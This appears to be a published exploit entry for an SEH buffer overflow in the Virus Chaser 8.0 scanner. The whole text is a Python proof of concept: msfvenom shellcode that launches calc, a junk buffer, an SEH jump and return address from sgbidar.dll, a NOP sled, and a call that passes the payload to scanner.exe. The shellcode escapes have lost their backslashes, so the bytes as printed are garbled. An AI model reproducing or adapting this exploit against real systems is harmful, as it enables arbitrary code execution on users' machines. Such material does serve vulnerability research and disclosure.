VirusChaser 8.0 Buffer Overflow
Posted on 17 April 2017
# Exploit Title: Virus Chaser 8.0 - Scanner component, SEH Overflow # Date: 14 April 2017 # Exploit Author: 0x41Li (0x41Li.D@gmail.com) # Vendor Homepage: https://www.viruschaser.com/ # Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip # Tested on: Windows 7 (Universal) import os from struct import pack ## msfvenom -a x86 --platform Windows -p windows/exec cmd=calc -b 'x00x0dx0ax09x22' -f c # x86/shikata_ga_nai succeeded with size 216 ## BADCHARS = x00x0dx0ax09 AVOIDED = x22 = " (Cut the buffer) shellcode= ("xbex7ax1fx2dx97xdaxd5xd9x74x24xf4x5ax33xc9xb1" "x30x83xc2x04x31x72x0fx03x72x75xfdxd8x6bx61x83" "x23x94x71xe4xaax71x40x24xc8xf2xf2x94x9ax57xfe" "x5fxcex43x75x2dxc7x64x3ex98x31x4axbfxb1x02xcd" "x43xc8x56x2dx7ax03xabx2cxbbx7ex46x7cx14xf4xf5" "x91x11x40xc6x1ax69x44x4exfex39x67x7fx51x32x3e" "x5fx53x97x4axd6x4bxf4x77xa0xe0xcex0cx33x21x1f" "xecx98x0cx90x1fxe0x49x16xc0x97xa3x65x7dxa0x77" "x14x59x25x6cxbex2ax9dx48x3fxfex78x1ax33x4bx0e" "x44x57x4axc3xfex63xc7xe2xd0xe2x93xc0xf4xafx40" "x68xacx15x26x95xaexf6x97x33xa4x1axc3x49xe7x70" "x12xdfx9dx36x14xdfx9dx66x7dxeex16xe9xfaxefxfc" "x4exf4xa5x5dxe6x9dx63x34xbbxc3x93xe2xffxfdx17" "x07x7fxfax08x62x7ax46x8fx9exf6xd7x7axa1xa5xd8" "xaexc2x28x4bx32x05") junk = "A"*688 jmp ="xebx0bx41x41" ## JMP 0B ret = pack('<L',0x10010c81) #pop ECX #pop ESI #RET [sgbidar.dll] (magic addr) nop = "x90"*24 payload = junk + jmp + ret + nop + shellcode print payload os.system("C:\"Program Files\VirusChaser\scanner.exe" "" + payload + """)
